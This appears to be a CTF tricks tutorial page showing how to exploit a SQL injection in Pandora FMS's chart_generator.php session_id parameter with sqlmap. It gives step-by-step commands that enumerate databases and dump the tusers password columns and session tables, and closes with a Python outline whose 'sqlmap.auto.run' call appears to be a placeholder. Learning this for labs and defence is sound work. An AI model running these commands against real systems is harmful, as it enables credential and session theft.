> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/sqli/vulnerability-exploitation/trick-0245.md).

# SQL Injection to Dump Database Tables/Data

***

Exploiting a found SQL Injection vulnerability to dump database tables and data using `sqlmap` is a common technique. Once `sqlmap` has confirmed an injectable parameter (like `session_id` in `http://localhost:8000/pandora_console/include/chart_generator.php`), you can proceed with enumeration and dumping. This specific vulnerability has been identified in Pandora FMS, often targeting the `session_id` parameter within the `chart_generator.php` file.

After confirming the SQL injection vulnerability on the `session_id` parameter, you can use `sqlmap` to enumerate the database. To find the database name, you can use:

```bash
sqlmap -u "http://localhost:8000/pandora_console/include/chart_generator.php?session_id=1" --dbs
```

This command instructs `sqlmap` to list all available databases on the target system accessible through the injection point.

Once the database name (e.g., `pandora`) is known, listing tables is straightforward:

```bash
sqlmap -u "http://localhost:8000/pandora_console/include/chart_generator.php?session_id=1" -D pandora --tables
```

This command targets the specified database (`-D pandora`) and lists all tables within it.

After identifying interesting tables (like `tsessions_php` or `tusers`), you can list columns within that table:

```bash
sqlmap -u "http://localhost:8000/pandora_console/include/chart_generator.php?session_id=1" -D pandora -T tsessions_php --columns
```

This command focuses on a specific table (`-T tsessions_php`) within the chosen database (`-D pandora`) and enumerates its columns.

Finally, to dump the data from the table:

```bash
sqlmap -u "http://localhost:8000/pandora_console/include/chart_generator.php?session_id=1" -D pandora -T tsessions_php --dump
```

This command retrieves all data from the specified table. If you are interested in specific columns, you can specify them using the `-C` option:

```bash
sqlmap -u "http://localhost:8000/pandora_console/include/chart_generator.php?session_id=1" -D pandora -T tusers -C 'userid,id_user,full_name,email,password' --dump
```

If the target requires authentication, you might need to include cookies or other headers. For example, if you have a valid cookie, you can add it to the command:

```bash
sqlmap -u "http://localhost:8000/pandora_console/include/chart_generator.php?session_id=1" --cookie="PHPSESSID=abcdef1234567890" -D pandora -T tsessions_php --dump
```

Remember to replace the URL, database name (`-D`), table name (`-T`), column names (`-C`), and potentially the cookie value with the specifics of your target. Sometimes, the injection point might be blind; `sqlmap` handles this automatically, but it might take longer.

For automated exploitation of this specific vulnerability, dedicated Python scripts often leverage `sqlmap` programmatically or via subprocess calls. Such scripts define the target URL and parameters and then execute a sequence of `sqlmap` commands to enumerate and dump data, often focusing on sensitive tables like `tusers` or `tsessions_php`. An example structure within such a script might involve setting up `sqlmap` options:

```python
url = "http://<TARGET_IP>/pandora_console/include/chart_generator.php?session_id=1"
# Optional: If authentication is needed
# cookie = "PHPSESSID=<SESSION_ID>"

# ... setup sqlmap options ...
# sqlmap.auto.run(url=url, data=data, cookie=cookie, level=5, risk=3, dbms='mysql', ...)

# Example of dumping a specific table
# sqlmap.auto.run(url=url, ..., dump=True, D='pandora', T='tusers')
```

Such scripts streamline the process, handling steps like database enumeration, table listing, and data dumping automatically after confirming the initial injection point. They often target specific tables known to contain user credentials or session information.
